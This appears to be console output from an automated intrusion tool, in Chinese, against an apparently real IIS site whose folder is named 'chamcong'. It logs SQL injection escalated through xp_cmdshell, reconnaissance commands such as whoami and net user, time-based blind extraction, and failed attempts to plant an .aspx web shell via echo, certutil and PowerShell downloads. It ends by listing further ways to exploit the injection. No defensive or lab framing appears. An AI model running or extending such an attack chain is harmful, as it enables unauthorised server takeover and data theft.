━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔥 SQL注入 → RCE → GetShell
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[阶段1] 启用xp_cmdshell
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  执行启用命令...
  ⚠️  可能权限不足（继续尝试）

[阶段2] 测试命令执行
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

  测试命令: whoami
    耗时: 495ms

  测试命令: hostname
    耗时: 512ms

  测试命令: ipconfig
    耗时: 498ms

  测试命令: net user
    耗时: 495ms

[阶段3] 通过时间盲注提取命令输出
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  提取whoami输出...

[阶段4] 写入WebShell
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  WebShell路径: C:\inetpub\wwwroot\chamcong\x.aspx

  [方法1] 通过xp_cmdshell echo写入...
  测试WebShell...
  ❌ 方法1失败

  [方法2] 通过certutil下载...
  测试WebShell...
  ❌ 方法2失败

  [方法3] 通过PowerShell下载...
  测试WebShell...
  ❌ 方法3失败

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ SQL注入利用完成
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

⚠️  WebShell未成功，但SQL注入可用于：
  1. 时间盲注提取数据
  2. 堆叠查询执行SQL
  3. 继续尝试RCE
